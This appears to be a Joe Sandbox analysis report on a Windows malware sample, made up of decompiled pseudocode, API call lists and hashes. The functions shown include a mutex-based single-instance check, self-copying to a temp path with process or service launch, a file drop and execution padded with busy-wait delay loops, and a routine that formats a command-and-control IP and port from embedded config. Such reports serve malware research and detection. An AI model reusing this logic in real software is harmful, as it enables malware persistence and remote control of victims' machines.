GetProcessHeap.KERNEL32(00000000,00A816C0,?,?,?,?,?,?,?,?,?,00A816C0), ref: 00A89CE8
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00A816C0), ref: 00A89CEF
LoadLibraryW.KERNEL32(00A816C0,?,?,?,?,?,?,?,?,?,?,?,00A816C0), ref: 00A89D14
GetProcessHeap.KERNEL32(00000000,00A816C0), ref: 00A89D38
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A816C0), ref: 00A89D3F
LoadLibraryW.KERNEL32(00A816C0), ref: 00A89D64
GetProcessHeap.KERNEL32(00000000,00A816C0), ref: 00A89D88
HeapFree.KERNEL32(00000000), ref: 00A89D8F
LoadLibraryW.KERNEL32(00A816C0), ref: 00A89DB4
GetProcessHeap.KERNEL32(00000000,00A816C0), ref: 00A89DD8
HeapFree.KERNEL32(00000000), ref: 00A89DDF
LoadLibraryW.KERNEL32(00A816C0), ref: 00A89E04
GetProcessHeap.KERNEL32(00000000,00A816C0), ref: 00A89E28
HeapFree.KERNEL32(00000000), ref: 00A89E2F
LoadLibraryW.KERNEL32(00A816C0), ref: 00A89E54
GetProcessHeap.KERNEL32(00000000,00A816C0), ref: 00A89E78
HeapFree.KERNEL32(00000000), ref: 00A89E7F
LoadLibraryW.KERNEL32(00A816C0), ref: 00A89EA4
GetProcessHeap.KERNEL32(00000000,00A816C0), ref: 00A89EC8
HeapFree.KERNEL32(00000000), ref: 00A89ECF

Part of subcall function 00A892A0: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00A892B5

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeLibraryLoad$AllocateDirectoryWindows
String ID:
API String ID: 357832750-0
Opcode ID: 576f21adb0650afd83ce16d374f1b97347074ee17227eeca65b8b59385c05883
Instruction ID: 9fc7fa69de8d77e0e794cb49e074fd7e09dd178f5f44b09bd87bd1fbd656428d
Opcode Fuzzy Hash: 576f21adb0650afd83ce16d374f1b97347074ee17227eeca65b8b59385c05883
Instruction Fuzzy Hash: 1D519171A40114BBEB00B7E0AD5EF9F3A6CEB81356F100520F906A7687EA355E478FB5

Uniqueness

Uniqueness Score: -1.00%

Function 00A89060, Relevance: 34.7, APIs: 23, Instructions: 160
memorysynchronizationtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E00A89060(void* __eflags) {
				void* _v8;
				char _v12;
				short _v140;
				short _v268;
				short _v396;
				long _t31;
				void* _t45;
				void* _t47;
				long _t50;
				long _t57;
				int _t59;
				signed int _t60;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t69;

				_t59 = 0;
				memset(0xa8c284, 0, 0x18);
				_t60 = 0xa81364;
				_t2 = _t59 + 0xc; // 0xc
				E00A81830(0xa81364, _t2, 0x4a604ebc,  &_v8);
				_t67 = _v8;
				 *0xa8c200( &_v140, 0x40, _t67,  *0xa8c27c);
				HeapFree(GetProcessHeap(), 0, _t67);
				_t66 = CreateMutexW(0, 0,  &_v140);
				if(_t66 == 0) {
					L12:
					 *0xa8c0b8( *0xa8c288);
					 *0xa8c064( *0xa8c28c);
					 *0xa8c064( *0xa8c290);
					 *0xa8c08c( *0xa8c284, 0);
					E00A88AA0();
					return E00A8A750(_t60 | 0xffffffff);
				}
				_t31 = WaitForSingleObject(_t66, 0);
				if(_t31 == 0 || _t31 == 0x80) {
					E00A81830(0xa81258, 0xc, 0x4a604ebc,  &_v8);
					_t68 = _v8;
					 *0xa8c200( &_v396, 0x40, _t68,  *0xa8c27c);
					HeapFree(GetProcessHeap(), 0, _t68);
					_t60 = 0xa81264;
					E00A81830(0xa81264, 0xc, 0x4a604ebc,  &_v8);
					_t69 = _v8;
					 *0xa8c200( &_v268, 0x40, _t69,  *0xa8c27c);
					HeapFree(GetProcessHeap(), 0, _t69);
					_t45 = CreateMutexW(0, 0,  &_v268);
					 *0xa8c2a0 = _t45;
					if(_t45 == 0) {
						goto L12;
					}
					_t47 = CreateEventW(0, 0, 0,  &_v396);
					 *0xa8c29c = _t47;
					if(_t47 != 0) {
						_t57 = SignalObjectAndWait(_t47,  *0xa8c2a0, 0xffffffff, 0);
						if(_t57 == 0 || _t57 == 0x80) {
							_t59 = ResetEvent( *0xa8c29c);
						}
					}
					ReleaseMutex(_t66);
					CloseHandle(_t66);
					if(_t59 != 0) {
						_t50 = GetTickCount();
						_push(0x10);
						_push(0x3e8);
						_push(0x3e8);
						_push(0);
						 *0xa8c280 = 1;
						_push(E00A88DD0);
						 *0xa8c278 = _t50 + 0x3e8;
						_push(0);
						_push( &_v12);
						if( *0xa8c0ec() != 0) {
							WaitForSingleObject( *0xa8c29c, 0xffffffff);
							 *0xa8c138(0, _v12, 0xffffffff);
						}
						CloseHandle( *0xa8c29c);
					}
				}
			}

0x00a8906e
0x00a89076
0x00a8907f
0x00a8908a
0x00a8908d
0x00a89098
0x00a890a5
0x00a890b7
0x00a890cc
0x00a890d0
0x00a8924f
0x00a89255
0x00a89261
0x00a8926d
0x00a8927b
0x00a89281
0x00a89294
0x00a89294
0x00a890d8
0x00a890e0
0x00a89100
0x00a8910b
0x00a89118
0x00a8912b
0x00a8913f
0x00a89144
0x00a8914f
0x00a8915c
0x00a8916f
0x00a89180
0x00a89186
0x00a8918d
0x00000000
0x00000000
0x00a891a0
0x00a891a6
0x00a891ad
0x00a891ba
0x00a891c2
0x00a891d7
0x00a891d7
0x00a891c2
0x00a891da
0x00a891e1
0x00a891e9
0x00a891eb
0x00a891f1
0x00a891f3
0x00a891f8
0x00a891fd
0x00a89204
0x00a8920e
0x00a89213
0x00a8921b
0x00a8921d
0x00a89226
0x00a89230
0x00a8923d
0x00a8923d
0x00a89249
0x00a89249
0x00a891e9

APIs

memset.NTDLL ref: 00A89076

Part of subcall function 00A81830: GetProcessHeap.KERNEL32(00000008,00A89F6B,00000000,00000000,00A81004,?,00A815F4,4DBAC13F,00A89F6B,?,00000000), ref: 00A81844
Part of subcall function 00A81830: RtlAllocateHeap.NTDLL(00000000,?,00A815F4), ref: 00A8184B

_snwprintf.NTDLL ref: 00A890A5
GetProcessHeap.KERNEL32(00000000,00A89315), ref: 00A890B0
HeapFree.KERNEL32(00000000), ref: 00A890B7
CreateMutexW.KERNEL32(00000000,00000000,?), ref: 00A890C6
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00A890D8
_snwprintf.NTDLL ref: 00A89118
GetProcessHeap.KERNEL32(00000000,00A89315), ref: 00A89124
HeapFree.KERNEL32(00000000), ref: 00A8912B
_snwprintf.NTDLL ref: 00A8915C
GetProcessHeap.KERNEL32(00000000,00A89315), ref: 00A89168
HeapFree.KERNEL32(00000000), ref: 00A8916F
CreateMutexW.KERNEL32(00000000,00000000,?), ref: 00A89180
CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 00A891A0
SignalObjectAndWait.KERNEL32(00000000,000000FF,00000000), ref: 00A891BA
ResetEvent.KERNEL32 ref: 00A891D1
ReleaseMutex.KERNEL32(00000000), ref: 00A891DA
CloseHandle.KERNEL32(00000000), ref: 00A891E1
GetTickCount.KERNEL32 ref: 00A891EB
CreateTimerQueueTimer.KERNEL32(?,00000000,00A88DD0,00000000,000003E8,000003E8,00000010), ref: 00A8921E
WaitForSingleObject.KERNEL32(000000FF), ref: 00A89230
DeleteTimerQueueTimer.KERNEL32(00000000,?,000000FF), ref: 00A8923D
CloseHandle.KERNEL32 ref: 00A89249

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: Heap$CreateProcessTimer$FreeMutexObjectWait_snwprintf$CloseEventHandleQueueSingle$AllocateCountDeleteReleaseResetSignalTickmemset
String ID:
API String ID: 3199319163-0
Opcode ID: b6c946b9d2767e1d301aa3eba1b4f11d7cb869608c686dc5b5755939c14f1cf7
Instruction ID: 5d62beec993cc0328f8a0b295ac64ec599779433108e3465ddd368b1f212d778
Opcode Fuzzy Hash: b6c946b9d2767e1d301aa3eba1b4f11d7cb869608c686dc5b5755939c14f1cf7
Instruction Fuzzy Hash: 37512771540215BBEB50FBE0EC8DFEA3B68EB05721F144225BA05E21E1EB749A568F70

Uniqueness

Uniqueness Score: -1.00%

Function 00A89620, Relevance: 31.8, APIs: 21, Instructions: 284
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 20%

			E00A89620(void* __ecx, void* __edx) {
				long _v8;
				long _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				long _v46;
				struct _PROCESS_INFORMATION _v52;
				WCHAR* _v56;
				intOrPtr _v60;
				void _v64;
				void* _v68;
				struct _STARTUPINFOW _v140;
				short _v660;
				int _t56;
				void* _t64;
				long _t71;
				void* _t74;
				signed int _t103;
				long _t115;
				void* _t119;
				void* _t120;
				void* _t123;
				intOrPtr _t125;
				void* _t126;
				intOrPtr _t127;
				intOrPtr* _t129;

				_t56 = lstrcmpiW(0xa8c9c8, 0xa8c7c0);
				if(_t56 != 0) {
					E00A818D0();
					memset( &_v660, 0, 0x208);
					memset( &_v64, 0, 0x1e);
					_v60 = 1;
					_v56 = 0xa8c9c8;
					_v52.hThread = 0xe14;
					_v52.hProcess = 0xa8c7c0;
					_t64 =  *0xa8c218( &_v64);
					if(_t64 != 0 || _v46 != _t64) {
						GetTempPathW(0x104,  &_v660);
						GetTempFileNameW( &_v660, 0, 0,  &_v660);
						_v56 = 0xa8c7c0;
						_v52.hProcess =  &_v660;
						_v46 = 0;
						_t71 =  *0xa8c218( &_v64);
						if(_t71 != 0 || _v46 != _t71) {
							goto L35;
						} else {
							_v46 = _t71;
							_v56 = 0xa8c9c8;
							_v52.hProcess = 0xa8c7c0;
							_t74 =  *0xa8c218( &_v64);
							if(_t74 != 0 || _v46 != _t74) {
								goto L35;
							} else {
								goto L8;
							}
						}
					} else {
						L8:
						E00A81970();
						if(( *0xa8c2a4 & 0x00000001) == 0) {
							memset( &_v140, 0, 0x44);
							_v140.cb = 0x44;
							_v140.dwFlags = 0x80;
							if(CreateProcessW(0xa8c7c0, 0, 0, 0, 0, 0, 0, 0,  &_v140,  &_v52) != 0) {
								CloseHandle(_v52);
								CloseHandle(_v52.hThread);
							}
							goto L35;
						} else {
							_t125 =  *0xa8c040(0, 0, 6);
							_v28 = _t125;
							if(_t125 == 0) {
								L35:
								return 1;
							} else {
								_t127 =  *0xa8c0c0(_t125, 0xa8c3b0, 0xa8c3b0, 0x12, 0x10, 2, 0, 0xa8c7c0, 0, 0, 0, 0, 0);
								_v24 = _t127;
								if(_t127 != 0) {
									_push(0);
									_push(0);
									_v12 = 0;
									_push( &_v32);
									_push( &_v20);
									_push(0);
									_push(0);
									_push(3);
									_push(0x30);
									_push(0);
									_push(_t125);
									if( *0xa8c054() == 0 && GetLastError() == 0xea) {
										_t119 = RtlAllocateHeap(GetProcessHeap(), 8, _v20);
										_v68 = _t119;
										if(_t119 != 0) {
											_push(0);
											_push(0);
											_push( &_v32);
											_push( &_v20);
											_push(_v20);
											_push(_t119);
											_push(3);
											_push(0x30);
											_push(0);
											_push(_t125);
											if( *0xa8c054() == 0) {
												_t120 = _v16;
											} else {
												_t103 =  *0xa8c3ac; // 0x0
												_t123 = _v32 * 0x2c + _t119;
												_v16 = _t123;
												_t120 = _v16;
												_t129 =  <  ? (_t103 & 0x0000000f) * 0x2c + _t119 : _t119;
												while(_t129 < _t123) {
													_t126 =  *0xa8c088(_t125,  *_t129, 1);
													if(_t126 != 0) {
														_push( &_v8);
														_push(0);
														_push(0);
														_push(1);
														_push(_t126);
														if( *0xa8c0b0() == 0 && GetLastError() == 0x7a) {
															_t120 = RtlAllocateHeap(GetProcessHeap(), 8, _v8);
															if(_t120 != 0) {
																_t115 =  *0xa8c0b0(_t126, 1, _t120, _v8,  &_v8);
																_v12 = _t115;
																if(_t115 == 0) {
																	HeapFree(GetProcessHeap(), _t115, _t120);
																}
															}
														}
														 *0xa8c0a8(_t126);
													}
													_t125 = _v28;
													_t129 = _t129 + 0x2c;
													_t123 = _v16;
													if(_v12 == 0) {
														continue;
													}
													break;
												}
												_t127 = _v24;
											}
											HeapFree(GetProcessHeap(), 0, _v68);
											if(_v12 != 0) {
												 *0xa8c090(_t127, 1, _t120);
												HeapFree(GetProcessHeap(), 0, _t120);
											}
										}
									}
								} else {
									_t127 =  *0xa8c088(_t125, 0xa8c3b0, 0x10);
								}
								if(_t127 != 0) {
									 *0xa8c048(_t127, 0, 0);
									 *0xa8c0a8(_t127);
								}
								 *0xa8c0a8(_t125);
								return 1;
							}
						}
					}
				} else {
					return _t56;
				}
			}

0x00a89636
0x00a8963e
0x00a89647
0x00a8965a
0x00a8966b
0x00a89674
0x00a89680
0x00a89687
0x00a8968e
0x00a89696
0x00a8969e
0x00a896b5
0x00a896c7
0x00a896d3
0x00a896da
0x00a896e1
0x00a896e8
0x00a896f0
0x00000000
0x00a896ff
0x00a896ff
0x00a89706
0x00a8970d
0x00a89714
0x00a8971c
0x00000000
0x00000000
0x00000000
0x00000000
0x00a8971c
0x00a8972b
0x00a8972b
0x00a8972b
0x00a89737
0x00a89940
0x00a89949
0x00a89956
0x00a89980
0x00a89985
0x00a8998e
0x00a8998e
0x00000000
0x00a8973d
0x00a89749
0x00a8974b
0x00a89750
0x00a89996
0x00a8999f
0x00a89756
0x00a8977e
0x00a89780
0x00a89785
0x00a8979c
0x00a8979e
0x00a897a3
0x00a897aa
0x00a897ae
0x00a897af
0x00a897b1
0x00a897b3
0x00a897b5
0x00a897b7
0x00a897b9
0x00a897c2
0x00a897eb
0x00a897ed
0x00a897f2
0x00a897f8
0x00a897fa
0x00a897ff
0x00a89803
0x00a89804
0x00a89807
0x00a89808
0x00a8980a
0x00a8980c
0x00a8980e
0x00a89817
0x00a89930
0x00a8981d
0x00a8981d
0x00a8982e
0x00a89832
0x00a89835
0x00a8983a
0x00a89840
0x00a89853
0x00a89857
0x00a8985c
0x00a8985d
0x00a8985f
0x00a89861
0x00a89863
0x00a8986c
0x00a8988b
0x00a8988f
0x00a8989c
0x00a898a2
0x00a898a7
0x00a898b2
0x00a898b2
0x00a898a7
0x00a8988f
0x00a898b9
0x00a898b9
0x00a898bf
0x00a898c2
0x00a898c9
0x00a898cc
0x00000000
0x00000000
0x00000000
0x00a898cc
0x00a898d2
0x00a898d2
0x00a898e1
0x00a898eb
0x00a898f1
0x00a89901
0x00a89901
0x00a898eb
0x00a897f2
0x00a89787
0x00a89795
0x00a89795
0x00a89909
0x00a89910
0x00a89917
0x00a89917
0x00a8991e
0x00a8992f
0x00a8992f
0x00a89750
0x00a89737
0x00a89646
0x00a89646
0x00a89646

APIs

lstrcmpiW.KERNEL32(00A8C9C8,00A8C7C0), ref: 00A89636
memset.NTDLL ref: 00A8965A
memset.NTDLL ref: 00A8966B
GetTempPathW.KERNEL32(00000104,?), ref: 00A896B5
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00A896C7

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: Tempmemset$FileNamePathlstrcmpi
String ID:
API String ID: 2872760765-0
Opcode ID: db09bb978c5d183c69c50101b624f1c0a78c55963150bcbc2626770a17668793
Instruction ID: ed0db73e5afe16156b45bf5b306ee6ed615429aadeb89e17554c1d0f2a564940
Opcode Fuzzy Hash: db09bb978c5d183c69c50101b624f1c0a78c55963150bcbc2626770a17668793
Instruction Fuzzy Hash: 6EA14D71A40209BFEB20EBE4EC89FAE7B78FB08B65F140129F605F6190D77499458F64

Uniqueness

Uniqueness Score: -1.00%

Function 00A89A90, Relevance: 25.6, APIs: 17, Instructions: 139
memoryfilesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00A89A90(void* __ecx, long __edx) {
				long _v8;
				void* _v12;
				struct _PROCESS_INFORMATION _v28;
				struct _STARTUPINFOW _v100;
				char _v228;
				short _v748;
				signed int _t28;
				int _t46;
				void* _t52;
				void* _t59;
				void* _t60;
				short _t61;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;

				_v8 = __edx;
				_t52 = __ecx;
				memset( &_v100, 0, 0x44);
				memset( &_v28, 0, 0x10);
				_v100.cb = 0x44;
				_v100.dwFlags = 0x80;
				_t61 = 0;
				do {
					if(_t61 < 0xfa00) {
						GetLastError();
					}
					_t61 = _t61 + 1;
				} while (_t61 < 0x8000000);
				_t28 = GetTickCount();
				_t7 = (_t28 & 0x0000000f) + 4; // 0x4
				E00A82240( &_v228, _t7);
				 *((short*)(_t68 + (_t28 & 0x0000000f) * 2 - 0xd8)) = 0;
				E00A81830(0xa81370, 0xc, 0x7d1cc189,  &_v12);
				_t64 = _v12;
				 *0xa8c200( &_v748, 0x104, _t64, 0xa8c5b8,  &_v228);
				HeapFree(GetProcessHeap(), 0, _t64);
				_t65 = 0;
				do {
					if(_t65 < 0xfa00) {
						GetLastError();
					}
					_t65 = _t65 + 1;
				} while (_t65 < 0x8000000);
				_t59 = CreateFileW( &_v748, 0x40000000, 0, 0, 2, 0x80, 0);
				_t66 = 0;
				do {
					if(_t66 < 0xfa00) {
						GetLastError();
					}
					_t66 = _t66 + 1;
				} while (_t66 < 0x8000000);
				if(_t59 != 0xffffffff) {
					WriteFile(_t59, _t52, _v8,  &_v8, 0);
					CloseHandle(_t59);
				}
				_t60 = 0;
				do {
					_t67 = 0;
					do {
						if(_t67 < 0xfa00) {
							GetLastError();
						}
						_t67 = _t67 + 1;
					} while (_t67 < 0x8000000);
					_t46 = CreateProcessW( &_v748, 0, 0, 0, 0, 0, 0, 0,  &_v100,  &_v28);
					if(_t46 != 0) {
						CloseHandle(_v28);
						return CloseHandle(_v28.hThread);
					} else {
						goto L20;
					}
					L23:
					L20:
					_t60 = _t60 + 1;
					Sleep(0xc8);
				} while (_t60 < 0x10);
				return _t46;
				goto L23;
			}

0x00a89aa1
0x00a89aa7
0x00a89aa9
0x00a89ab7
0x00a89ac0
0x00a89ac7
0x00a89ace
0x00a89ad0
0x00a89ad6
0x00a89ad8
0x00a89ad8
0x00a89ade
0x00a89adf
0x00a89ae7
0x00a89af8
0x00a89afb
0x00a89b07
0x00a89b1d
0x00a89b22
0x00a89b3e
0x00a89b51
0x00a89b57
0x00a89b60
0x00a89b66
0x00a89b68
0x00a89b68
0x00a89b6e
0x00a89b6f
0x00a89b96
0x00a89b98
0x00a89ba0
0x00a89ba6
0x00a89ba8
0x00a89ba8
0x00a89bae
0x00a89baf
0x00a89bba
0x00a89bc7
0x00a89bce
0x00a89bce
0x00a89bd4
0x00a89bd6
0x00a89bd6
0x00a89bd8
0x00a89bde
0x00a89be0
0x00a89be0
0x00a89be6
0x00a89be7
0x00a89c0c
0x00a89c14
0x00a89c31
0x00a89c46
0x00000000
0x00000000
0x00000000
0x00000000
0x00a89c16
0x00a89c1b
0x00a89c1c
0x00a89c22
0x00a89c2d
0x00000000

APIs

memset.NTDLL ref: 00A89AA9
memset.NTDLL ref: 00A89AB7
GetLastError.KERNEL32 ref: 00A89AD8
GetTickCount.KERNEL32 ref: 00A89AE7
_snwprintf.NTDLL ref: 00A89B3E
GetProcessHeap.KERNEL32(00000000,?), ref: 00A89B4A
HeapFree.KERNEL32(00000000), ref: 00A89B51
GetLastError.KERNEL32 ref: 00A89B68
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00A89B90
GetLastError.KERNEL32 ref: 00A89BA8
WriteFile.KERNEL32(00000000,?,00A88F6C,00A88F6C,00000000), ref: 00A89BC7
CloseHandle.KERNEL32(00000000), ref: 00A89BCE
GetLastError.KERNEL32 ref: 00A89BE0
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00A89C0C
Sleep.KERNEL32(000000C8), ref: 00A89C1C

Memory Dump Source

Source File: 00000000.00000002.196081466.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.196076849.0000000000A80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196091012.0000000000A8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196095270.0000000000A8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196100057.0000000000A8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_pitEBNziGR.jbxd

Yara matches

Similarity

API ID: ErrorLast$CreateFileHeapProcessmemset$CloseCountFreeHandleSleepTickWrite_snwprintf
String ID:
API String ID: 2430354324-0
Opcode ID: b2ce7b2379fe5aead72131552bf28c7782bbbf039cad0f3778c6f8f2950a7ed9
Instruction ID: 4e72593699cf6d8326ea7f0d7047a60370b31b8b1c359f588f1fc5604df80175
Opcode Fuzzy Hash: b2ce7b2379fe5aead72131552bf28c7782bbbf039cad0f3778c6f8f2950a7ed9
Instruction Fuzzy Hash: 9141A772940114ABEB10EBD4EC8DFEEB779FB04721F010261FA4AE7491DB3059868FA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A88520, Relevance: 22.7, APIs: 15, Instructions: 152
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E00A88520(void* _a4, long* _a8) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				void* _v20;
				char _v24;
				void* _v28;
				char _v32;
				void* _v40;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v188;
				void* _t42;
				signed char* _t62;
				void* _t64;
				void _t79;
				long _t82;
				long* _t83;
				signed char* _t88;
				void* _t92;
				long* _t103;
				void* _t104;
				void* _t105;

				_v32 = 0x10;
				_t42 = E00A88420( *_a4,  *((intOrPtr*)(_a4 + 4)),  &_v24);
				_t103 = _a8;
				_v28 = _t42;
				_t83 =  &(_t103[1]);
				 *_t83 = 0;
				 *_t103 = 0;
				if(_t42 != 0) {
					if(E00A88700( &_v40,  &_v32) != 0) {
						if(E00A823F0( &_v40,  &_v12) != 0) {
							E00A81830(0xa8c020, 0xc, 0x58619fa4,  &_a4);
							_t88 =  *0xa8c298; // 0x0
							_t104 = _a4;
							 *0xa8c200( &_v188, 0x40, _t104, _t88[3] & 0x000000ff, _t88[2] & 0x000000ff, _t88[1] & 0x000000ff,  *_t88 & 0x000000ff);
							HeapFree(GetProcessHeap(), 0, _t104);
							_t62 =  *0xa8c298; // 0x0
							_push(_t88);
							_t64 = E00A81C50( &_v60,  &_v188, _t62[4] & 0x0000ffff);
							_t105 = _v12;
							if(_t64 != 0) {
								_push(_v8);
								_push(_t105);
								if(E00A81D40( &_v60) != 0) {
									if(E00A81E50( &_v60,  &_v12,  &_v8) != 0) {
										if(E00A82530( &_v12,  &_v20) != 0) {
											_t92 = _v20;
											_t79 =  *_t92;
											 *_t83 = _t79;
											if(_t79 < 0x4000000) {
												_t82 = E00A884C0(_t92 + 4, _v16 - 4, _t83);
												_t92 = _v20;
												 *_t103 = _t82;
											}
											HeapFree(GetProcessHeap(), 0, _t92);
										}
										HeapFree(GetProcessHeap(), 0, _v12);
									}
									 *0xa8c234(_v52);
								}
								 *0xa8c234(_v56);
								 *0xa8c234(_v60);
							}
							HeapFree(GetProcessHeap(), 0, 0);
							HeapFree(GetProcessHeap(), 0, _t105);
						}
						HeapFree(GetProcessHeap(), 0, _v40);
					}
					HeapFree(GetProcessHeap(), 0, _v28);
				}
				return 0 |  *_t103 != 0x00000000;
			}

0x00a88538
0x00a8853f
0x00a88544
0x00a8854a
0x00a8854d
0x00a88550
0x00a88556
0x00a8855e
0x00a88571
0x00a88588
0x00a885a1
0x00a885a6
0x00a885ac
0x00a885cc
0x00a885df
0x00a885e5
0x00a885f0
0x00a885f9
0x00a885fe
0x00a88606
0x00a8860c
0x00a88612
0x00a88620
0x00a88636
0x00a88649
0x00a8864b
0x00a8864e
0x00a88650
0x00a88657
0x00a88663
0x00a88668
0x00a8866e
0x00a8866e
0x00a8867a
0x00a8867a
0x00a8868c
0x00a8868c
0x00a88695
0x00a88695
0x00a8869e
0x00a886a7
0x00a886a7
0x00a886b8
0x00a886c8
0x00a886c8
0x00a886da
0x00a886da
0x00a886ec
0x00a886ec
0x00a886ff

APIs

Part of subcall function 00A88420: GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?,000DBBA0), ref: 00A88468
Part of subcall function 00A88420: RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 00A8846F
Part of subcall function 00A88420: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,000DBBA0), ref: 00A88493
Part of subcall function 00A88420: HeapFree.KERNEL32(00000000,?,000DBBA0,?,000DBBA0), ref: 00A8849A

Part of subcall function 00A88700: GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?,00A8856F), ref: 00A88746
Part of subcall function 00A88700: RtlAllocateHeap.NTDLL(00000000), ref: 00A8874D
Part of subcall function 00A88700: memcpy.NTDLL(00000000,?,?), ref: 00A887A9

_snwprintf.NTDLL ref: 00A885CC
GetProcessHeap.KERNEL32(00000000,?), ref: 00A885D8
HeapFree.KERNEL32(00000000), ref: 00A885DF

Part of subcall function 00A81C50: memset.NTDLL ref: 00A81C70
Part of subcall function 00A81C50: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A81C9C
Part of subcall function 00A81C50: GetProcessHeap.KERNEL32(00000008,00000000), ref: 00A81CAE
Part of subcall function 00A81C50: RtlAllocateHeap.NTDLL(00000000), ref: 00A81CB5
Part of subcall function 00A81C50: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A81CD0
Part of subcall function 00A81C50: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A81CED
Part of subcall function 00A81C50: HeapFree.KERNEL32(00000000), ref: 00A81CF4

GetProcessHeap.KERNEL32(00000000,?), ref: 00A88673
HeapFree.KERNEL32(00000000), ref: 00A8867A

Part of subcall function 00A884C0: GetProcessHeap.KERNEL32(00000000,00A88668,?,?,?,00A88668,?), ref: 00A884D5
Part of subcall function 00A884C0: RtlAllocateHeap.NTDLL(00000000), ref: 00A884DC
Part of subcall function 00A884C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A884FF
Part of subcall function 00A884C0: HeapFree.KERNEL32(00000000), ref: 00A88506

GetProcessHeap.KERNEL32(00000000,?), ref: 00A88685
HeapFree.KERNEL32(00000000), ref: 00A8868C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A886B1
HeapFree.KERNEL32(00000000), ref: 00A886B8
GetProcessHeap.KERNEL32(00000000,?), ref: 00A886C1
HeapFree.KERNEL32(00000000), ref: 00A886C8

Part of subcall function 00A81D40: GetProcessHeap.KERNEL32(00000000,00000000,?,00A8861B), ref: 00A81DA2
Part of subcall function 00A81D40: HeapFree.KERNEL32(00000000,?,00A8861B), ref: 00A81DA9

Part of subcall function 00A81E50: GetProcessHeap.KERNEL32(00000000,?,?,?,?,00A88631), ref: 00A81E89
Part of subcall function 00A81E50: RtlAllocateHeap.NTDLL(00000000), ref: 00A81E90
Part of subcall function 00A81E50: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A81EFB
Part of subcall function 00A81E50: HeapFree.KERNEL32(00000000), ref: 00A81F02

GetProcessHeap.KERNEL32(00000000,?), ref: 00A886D3
HeapFree.KERNEL32(00000000), ref: 00A886DA

Part of subcall function 00A81830: GetProcessHeap.KERNEL32(00000008,00A89F6B,00000000,00000000,00A81004,?,00A815F4,4DBAC13F,00A89F6B,?,00000000), ref: 00A81844
Part of subcall function 00A81830: RtlAllocateHeap.NTDLL(00000000,?,00A815F4), ref: 00A8184B

GetProcessHeap.KERNEL32(00000000,?), ref: 00A886E5
HeapFree.KERNEL32(00000000), ref: 00A886EC

Part of subcall function 00A823F0: GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?), ref: 00A82422
Part of subcall function 00A823F0: RtlAllocateHeap.NTDLL(00000000), ref: 00A82429
Part of subcall function 00A823F0: memcpy.NTDLL(00A88583,?,?), ref: 00A82467
